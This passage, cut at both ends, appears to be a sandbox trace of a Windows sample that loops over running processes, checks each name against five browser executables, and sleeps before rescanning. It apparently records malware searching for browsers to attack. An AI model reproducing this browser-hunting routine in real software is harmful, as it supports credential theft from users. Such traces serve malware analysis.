lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0195.302] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0195.302] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0195.302] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0195.303] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0195.303] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.303] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.303] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0195.303] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0195.303] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0195.303] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0195.303] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.303] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.304] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.304] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.304] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.304] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.304] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.304] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0195.304] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0195.304] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0195.304] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0195.304] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0195.304] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.304] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.305] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.305] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.305] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.305] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.305] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.305] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0195.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0195.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0195.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0195.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0195.306] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.306] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.384] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.385] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.385] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.385] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0195.385] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.385] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.385] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.385] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.385] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.385] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0195.385] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.385] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0195.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0195.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0195.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0195.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0195.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.386] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0195.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0195.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0195.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0195.386] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.386] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.387] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.387] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.387] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.387] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0195.387] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.387] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.388] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0195.388] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.388] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.389] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0195.389] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0195.389] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0195.389] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0195.389] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.389] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0195.389] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0195.389] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0195.389] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0195.389] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0195.389] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0195.390] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0195.390] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0195.390] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0195.390] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0195.390] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0195.390] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.390] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0195.391] CloseHandle (hObject=0xe8) returned 1 [0195.391] Sleep (dwMilliseconds=0x3e8) [0196.413] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0196.415] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.416] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0196.416] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0196.416] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0196.416] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0196.416] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0196.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0196.416] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0196.416] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0196.416] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0196.416] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0196.416] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0196.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0196.417] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0196.417] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0196.417] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0196.417] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0196.417] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.418] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0196.418] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0196.418] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0196.418] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0196.418] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0196.418] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0196.418] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0196.418] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0196.418] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0196.418] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0196.419] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0196.419] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0196.419] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0196.419] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0196.419] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0196.419] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0196.419] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0196.419] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0196.419] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0196.419] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0196.420] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0196.420] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0196.420] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0196.420] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0196.420] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.420] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0196.421] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0196.421] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0196.421] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0196.421] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0196.421] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0196.421] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0196.421] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0196.421] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0196.421] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0196.421] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.421] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.422] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.422] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.422] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.422] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.422] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.422] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.422] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.422] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.422] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.422] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.423] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.423] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.423] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.423] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.423] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.423] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.423] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.424] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.424] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0196.425] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0196.425] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0196.425] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0196.425] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0196.425] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.425] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.425] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.425] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.425] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.425] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.426] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.426] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0196.426] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0196.426] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0196.426] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0196.426] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.426] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0196.427] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0196.427] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0196.427] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0196.427] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0196.427] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0196.427] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0196.427] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0196.427] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0196.427] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0196.427] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0196.427] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0196.427] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0196.428] lstrcmpiA (lpString1="taskhost.exe", 